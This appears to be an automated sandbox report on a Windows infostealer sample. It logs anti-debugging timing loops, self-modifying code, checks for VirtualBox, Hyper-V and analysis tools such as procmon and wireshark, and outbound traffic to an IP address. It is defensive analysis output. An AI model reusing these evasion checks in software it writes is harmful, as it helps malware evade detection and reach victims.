Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E202DB second address: 6E202E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E202E1 second address: 6E202E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E202E5 second address: 6E2037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F9D00F1DB67h 0x0000000e pop esi 0x0000000f jmp 00007F9D00F1DB66h 0x00000014 pop ebx 0x00000015 jmp 00007F9D00F1DB60h 0x0000001a mov esp, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F9D00F1DB5Dh 0x00000025 xor ax, 3136h 0x0000002a jmp 00007F9D00F1DB61h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9D00F1DB60h 0x00000036 adc si, 9858h 0x0000003b jmp 00007F9D00F1DB5Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E2037A second address: 6E20392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E20392 second address: 6E20396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E507C1 second address: 6E507C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E507C7 second address: 6E507CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E507CB second address: 6E507CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E507CF second address: 6E507EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D00F1DB5Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E507EA second address: 6E507F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E509FB second address: 6E50AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 640365B2h 0x00000008 pushfd 0x00000009 jmp 00007F9D00F1DB63h 0x0000000e xor ah, FFFFFFAEh 0x00000011 jmp 00007F9D00F1DB69h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F9D00F1DB67h 0x00000022 and ah, FFFFFFBEh 0x00000025 jmp 00007F9D00F1DB69h 0x0000002a popfd 0x0000002b mov bl, cl 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F9D00F1DB64h 0x00000038 and cx, 55E8h 0x0000003d jmp 00007F9D00F1DB5Bh 0x00000042 popfd 0x00000043 jmp 00007F9D00F1DB68h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50AB4 second address: 6E50ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50ABA second address: 6E50ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50ABE second address: 6E50AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9D01181AB8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50AEF second address: 6E50AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50AFE second address: 6E50B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50B04 second address: 6E50B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50B08 second address: 6E50B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50B0C second address: 6E50B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c jmp 00007F9D00F1DB5Dh 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F9D00F1DB5Dh 0x00000023 adc ecx, 35C0E6D6h 0x00000029 jmp 00007F9D00F1DB61h 0x0000002e popfd 0x0000002f mov ebx, esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E50B65 second address: 6E50B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0A26 second address: 6EC0A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3FAAE8B2h 0x00000008 mov ax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 mov ax, 6FF3h 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F9D00F1DB66h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9D00F1DB5Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0A66 second address: 6EC0A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0A75 second address: 6EC0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, byte ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9D00F1DB5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0AA4 second address: 6EC0B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d mov si, 0F83h 0x00000011 pushfd 0x00000012 jmp 00007F9D01181AB8h 0x00000017 sub ecx, 1D79C348h 0x0000001d jmp 00007F9D01181AABh 0x00000022 popfd 0x00000023 popad 0x00000024 and dl, 00000007h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F9D01181AABh 0x00000030 add si, C58Eh 0x00000035 jmp 00007F9D01181AB9h 0x0000003a popfd 0x0000003b mov ah, 28h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0B21 second address: 6EC0B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9D00F1DB67h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0B4A second address: 6EC0B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0B50 second address: 6EC0B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0B54 second address: 6EC0BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9D711B713Ch 0x0000000e jmp 00007F9D01181AB7h 0x00000013 sub ecx, ecx 0x00000015 pushad 0x00000016 jmp 00007F9D01181AB5h 0x0000001b mov eax, 39B03A37h 0x00000020 popad 0x00000021 inc ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9D01181AB9h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0BB3 second address: 6EC0BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EC0BB9 second address: 6EC0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F1D second address: 6EA0F21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F21 second address: 6EA0F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F27 second address: 6EA0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EA0F2D second address: 6EA0F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB04C5 second address: 6EB054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D00F1DB67h 0x00000009 adc ax, C7EEh 0x0000000e jmp 00007F9D00F1DB69h 0x00000013 popfd 0x00000014 mov dl, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F9D00F1DB66h 0x00000020 pushfd 0x00000021 jmp 00007F9D00F1DB62h 0x00000026 sub si, 69C8h 0x0000002b jmp 00007F9D00F1DB5Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp], ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB054A second address: 6EB0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0565 second address: 6EB05A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov eax, 516913A3h 0x00000011 mov ah, 46h 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F9D00F1DB5Dh 0x0000001d pop ecx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05A2 second address: 6EB05A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05A8 second address: 6EB05EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F9D00F1DB62h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9D00F1DB60h 0x00000016 push eax 0x00000017 jmp 00007F9D00F1DB5Bh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, 84F2h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB05EB second address: 6EB0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F9D01181AB0h 0x00000011 sub ecx, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ah, 5Fh 0x00000018 jmp 00007F9D01181AAFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0631 second address: 6EB06F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9D00F1DB5Fh 0x00000009 jmp 00007F9D00F1DB63h 0x0000000e popfd 0x0000000f mov ecx, 2409523Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F9D00F1DB60h 0x0000001f sub si, 3F28h 0x00000024 jmp 00007F9D00F1DB5Bh 0x00000029 popfd 0x0000002a call 00007F9D00F1DB68h 0x0000002f mov bh, ah 0x00000031 pop edx 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F9D00F1DB5Dh 0x00000039 xchg eax, edi 0x0000003a pushad 0x0000003b mov di, si 0x0000003e pushfd 0x0000003f jmp 00007F9D00F1DB68h 0x00000044 and ah, 00000018h 0x00000047 jmp 00007F9D00F1DB5Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, 00000001h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007F9D00F1DB5Bh 0x0000005b mov dx, si 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB06F3 second address: 6EB0726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d jmp 00007F9D01181AAEh 0x00000012 mov ecx, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0726 second address: 6EB0743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D00F1DB69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0743 second address: 6EB07B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D01181AB7h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp ecx, 01h 0x0000000e pushad 0x0000000f mov bx, 94D6h 0x00000013 pushfd 0x00000014 jmp 00007F9D01181AB7h 0x00000019 xor eax, 33A9595Eh 0x0000001f jmp 00007F9D01181AB9h 0x00000024 popfd 0x00000025 popad 0x00000026 jne 00007F9D711A38D3h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov edx, 4060DEBEh 0x00000034 mov dl, 28h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB07B2 second address: 6EB07B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB07B8 second address: 6EB0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9D01181AB4h 0x00000013 or si, 26E8h 0x00000018 jmp 00007F9D01181AABh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F9D01181AB8h 0x00000024 sbb cx, 3948h 0x00000029 jmp 00007F9D01181AABh 0x0000002e popfd 0x0000002f popad 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F9D01181AB0h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6EB0839 second address: 6EB083F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E7038B second address: 6E70391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 6E70391 second address: 6E70397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSpecial instruction interceptor: First address: 1421877 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSpecial instruction interceptor: First address: 15BCC34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSpecial instruction interceptor: First address: 15BC8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSpecial instruction interceptor: First address: 15E953A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSpecial instruction interceptor: First address: 164B447 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00F29980 rdtsc 0_2_00F29980
Source: C:\Users\user\Desktop\QMtCX5RLOP.exe TID: 2500Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D4255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D4255D
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D429FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D429FF
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D4255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D4255D
Source: QMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: QMtCX5RLOP.exe, 00000000.00000003.1810161385.000000000088E000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828788277.000000000088F000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809498522.0000000000880000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809683867.0000000000883000.00000004.00000020.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000003.1809473978.0000000000873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfN
Source: QMtCX5RLOP.exeBinary or memory string: Hyper-V RAW
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: QMtCX5RLOP.exe, 00000000.00000003.1728801712.0000000000824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile opened: NTICE
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile opened: SICE
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00F29980 rdtsc 0_2_00F29980
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D41160 SetUnhandledExceptionFilter,0_2_00D41160
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D411A3 SetUnhandledExceptionFilter,0_2_00D411A3
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D413C9 SetUnhandledExceptionFilter,0_2_00D413C9
Source: QMtCX5RLOP.exe, QMtCX5RLOP.exe, 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: U%Program Manager
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 81.29.149.125:80
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 81.29.149.125:80

Mitre Att&ck Matrix

